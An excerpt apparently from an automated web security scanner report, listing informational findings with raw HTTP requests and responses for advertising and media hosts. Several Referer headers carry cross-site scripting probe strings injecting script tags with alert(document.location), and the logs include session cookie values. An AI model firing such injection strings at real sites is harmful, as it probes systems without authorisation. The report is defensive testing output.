var c3=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...
16.9. http://p.raasnet.com/partners/universal/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/universal/in

Request

GET /partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:06 GMT;
Content-Type: text/html
Content-Length: 207
Date: Mon, 12 Sep 2011 13:06:06 GMT
Connection: close

<img border='0' width='1' height='1' src='http://p.raasnet.com/partners/exelate'/><img border='0' width='1' height='1' src='http://rd.rlcdn.com/rd?site=43881&type=redir&url=http://dts1.raasnet.com/dts
...[SNIP]...
16.10. http://sana.newsinc.com/sana.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sana.newsinc.com
Path:   /sana.html

Request

GET /sana.html?wid=4106&uut=A5859D26-18DA-46D0-B4A1-83A199A664121315849734506&furl=http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html&purl=&ssid=ndn&anid=10557&ltype=1&plid=994&rdm=12037031 HTTP/1.1
Host: sana.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "b36bf549d471e0b15dc89899e8b573f7:1307641380"
Last-Modified: Thu, 09 Jun 2011 17:42:59 GMT
Accept-Ranges: bytes
Content-Length: 209
Content-Type: text/html
Date: Mon, 12 Sep 2011 12:49:29 GMT
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head></head>
<body></body>
<html
...[SNIP]...
16.11. http://view.atdmt.com/ADO/iview/278612752/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /ADO/iview/278612752/direct

Request

GET /ADO/iview/278612752/direct;wi.1;hi.1/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:48:38 GMT
Connection: close
Content-Length: 406

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/171946551/278612752/direct;wi.1;hi.1/01" onclick="(new Image).src='http://t.atdmt.com'"><img src="http://spe.atdmt.com/images/
...[SNIP]...
16.12. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/1829737

Request

GET /CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:47:58 GMT
Connection: close
Content-Length: 7028

<html><head><title>ATT_Potter_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0p
...[SNIP]...
16.13. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334302974/direct/01/4245069

Request

GET /CNT/iview/334302974/direct/01/4245069?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f HTTP/1.1
Host: view.atdmt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: AA002=1311365777-4076437; MUID=360F843730F542A7A6E2E0ACB7BADB9D; ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3; ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 13:06:09 GMT
Connection: close
Content-Length: 7033

<html><head><title>ATT_NoImage_70_728x90_v2</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0
...[SNIP]...
16.14. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 12 Sep 2011 12:49:03 GMT
Connection: close
Content-Length: 349

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1314814617-3398750%7cMUI
...[SNIP]...
16.15. http://virtualgoods.bigdoor.com/media/html/gambit/about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://virtualgoods.bigdoor.com
Path:   /media/html/gambit/about.html

Request

GET /media/html/gambit/about.html HTTP/1.1
Host: virtualgoods.bigdoor.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: yFKV3YfhUDS8nRre4AHspZaPSNjE7J8Gz0l5UjvN6jucANGQzzGYu82tefq2SkjO
x-amz-request-id: 8193771D30318D39
Date: Mon, 25 Jul 2011 08:08:20 GMT
x-amz-meta-s3cmd-attrs: uid:1006/gname:brian/uname:bryan/gid:1005/mode:33188/mtime:1308160800/atime:1308160841/ctime:1308160841
Last-Modified: Wed, 15 Jun 2011 18:00:43 GMT
ETag: "b91541932222aea74715fb286dc8f109"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 2267
Server: AmazonS3
Age: 21254
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: e43af31c5ccb8504bffb3e154fc5faed9a19dcc322144df48be112a586c9a137e6eef8d6be72799d
Via: 1.0 a1c5ac3682794e4a6d3935bd273efd27.cloudfront.net:11180 (CloudFront), 1.0 5e67960ca17a2cc60393e082766a7dca.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>
       <title>About Bigdoor</title>
       <style type="text/css">
           body {
               ma
...[SNIP]...
16.16. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Request

GET /modules/facebook_connect/xd_receiver.php HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Cache-Control: max-age=225065900
Expires:
Pragma:
Vary:
Vary: Accept-Encoding
Content-type: text/html
Date: Mon, 12 Sep 2011 13:03:52 GMT
Server: lighttpd/1.4.26
Content-Length: 636


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
17. Content type incorrectly stated  previous  next
There are 31 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

17.1. http://4qinvite.4q.iperceptions.com/1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /1.aspx?sdfc=db35e419-4469-64f48812-f81a-4e4c-930c-5aa18d636b5f&lID=1&loc=4Q-WEB2 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.digitaldollhouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE03
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Mon, 12 Sep 2011 12:49:56 GMT
Content-Length: 79

var dm = document.domain;document.cookie='IPE_S_5432=5432;Path=/;domain=' + dm;
17.2. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
17.3. http://adserv.impactengine.com/www/kr/36/ui/b8/objembed.html/@@1315499800@@  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserv.impactengine.com
Path:   /www/kr/36/ui/b8/objembed.html/@@1315499800@@

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /www/kr/36/ui/b8/objembed.html/@@1315499800@@ HTTP/1.1
Host: adserv.impactengine.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sun, 11 Sep 2011 21:15:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 09 Sep 2011 13:57:03 GMT
Accept-Ranges: bytes
Content-Length: 19920
Content-Type: text/html; charset=UTF-8
Age: 55992
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: d97735d9aab9d7e1a623012702321f3bbd9e7221898108ec7a6b6b196247cac649f7f372e2b2cf96
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 1e5670446b2d0f62f93100e25163ce0a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

var eventString;
var activityViewerReady;
//
var mouseEvent                         = null;
var eventLogContainer                 = null;
var offsetPositionX                     = 0;
var offsetPositionY                     = 0;
var showLogFooter                     =
...[SNIP]...
17.4. http://amch.questionmarket.com/adsc/d879999/4/880134/randm.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d879999/4/880134/randm.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adsc/d879999/4/880134/randm.js HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Apache
Last-Modified: Tue, 16 Aug 2011 04:09:28 GMT
ETag: "e02507ca-1-4aa978bc33a0f"
Accept-Ranges: bytes
Content-Length: 1
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Cache-Control: public, max-age=1800
Content-Type: application/javascript

;
17.5. http://amch.questionmarket.com/adsc/d907755/101/908678/adscout.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adsc/d907755/101/908678/adscout.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /adsc/d907755/101/908678/adscout.php?ord=4246944 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:06:12 GMT
Server: Apache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 1
Content-Type: text/html

;
17.6. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/st.php?survey_num=918795&site=65685687&code=43061174&randnum=4026444 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:04:55 GMT
Server: Apache/2.2.14 (Ubuntu)
DL_S: a201
Vary: Accept-Encoding
Content-Length: 1577
Content-Type: text/html; charset=utf-8

(function() {
var rp=parseFloat("100"),r=Math.random()*10000,s_id="DL_918795_8_43061174",d=document,w=window;

var swid = "";
if ('' != "") {
   var tags = document.getElementsByTagN
...[SNIP]...
17.7. http://amch.questionmarket.com/adscgen/sta.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /adscgen/sta.php?survey_num=879999&site=1223610&code=1509596&ut_sys=pointroll HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:06:13 GMT
Server: Apache/2.2.14 (Ubuntu)
DL_S: a206
Vary: Accept-Encoding
Content-Length: 1
Content-Type: text/html; charset=utf-8

;
17.8. http://bin.clearspring.com/at/v/1/button1.6.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bin.clearspring.com
Path:   /at/v/1/button1.6.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /at/v/1/button1.6.swf HTTP/1.1
Host: bin.clearspring.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
